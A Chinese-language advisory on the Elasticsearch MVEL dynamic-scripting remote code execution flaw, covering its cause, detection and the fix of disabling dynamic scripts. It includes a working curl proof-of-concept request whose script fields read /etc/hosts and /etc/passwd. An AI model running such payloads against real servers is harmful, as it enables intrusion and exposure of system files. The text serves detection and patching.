原理
這個漏洞實際上非常簡單,ElasticSearch有腳本執行(
scripting)的功能,可以很友善地對查詢出來的資料再加工處理。
ElasticSearch用的腳本引擎是
MVEL,這個引擎沒有做任何的防護,或者沙盒包裝,是以直接可以執行任意代碼。
而在ElasticSearch裡,預設配置是打開動态腳本功能的,是以使用者可以直接通過http請求,執行任意代碼。
其實官方是清楚這個漏洞的,在文檔裡有說明:
First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween.
檢測方法
線上檢測:
http://tool.scanv.com/es.html 可以檢測任意位址
http://bouk.co/blog/elasticsearch-rce/poc.html 隻檢測localhost,不過會輸出/etc/hosts和/etc/passwd檔案的内容到網頁上
自己手動檢測:
curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {
"/etc/hosts": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
},
"/etc/passwd": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
}
}
}
' 處理辦法
關掉執行腳本功能,在配置檔案elasticsearch.yml裡為每一個結點都加上:
script.disable_dynamic: true http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts
官方會在1.2版本預設關閉動态腳本。
https://github.com/elasticsearch/elasticsearch/issues/5853
參考:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html
http://bouk.co/blog/elasticsearch-rce/
![“雲管邊端”協同的邊緣計算安全防護解決方案0 引 言1 5G 及邊緣計算2 邊緣計算面臨的風險3 “雲管邊端”安全防護技術4 “雲管邊端”安全防護實踐5 結 語[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)